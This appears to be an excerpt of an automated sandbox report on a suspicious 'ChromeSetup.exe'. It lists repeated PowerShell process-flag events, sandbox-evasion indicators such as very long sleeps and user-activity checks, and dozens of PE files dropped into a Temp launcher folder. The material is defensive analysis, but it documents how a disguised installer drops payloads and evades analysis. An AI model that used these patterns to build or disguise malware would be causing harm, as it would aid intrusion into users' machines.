Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5946			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3763			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\client\jvm.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\verify.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jdwp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_common.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_socket.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\instrument.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\resource.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2native.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\splashscreen.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fxplugins.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\eula.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\nio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\lcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\UAC.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fontmanager.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\deploy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\hprof.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jawt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsound.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_sw.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\decora_sse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\net.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glib-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jli.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcp120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glass.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\bci.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\npt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\Intel_Processor_Identification_Utility-Legacy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsdt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\awt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\zip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font_t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsoundds.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\NAct.dll	Jump to dropped file
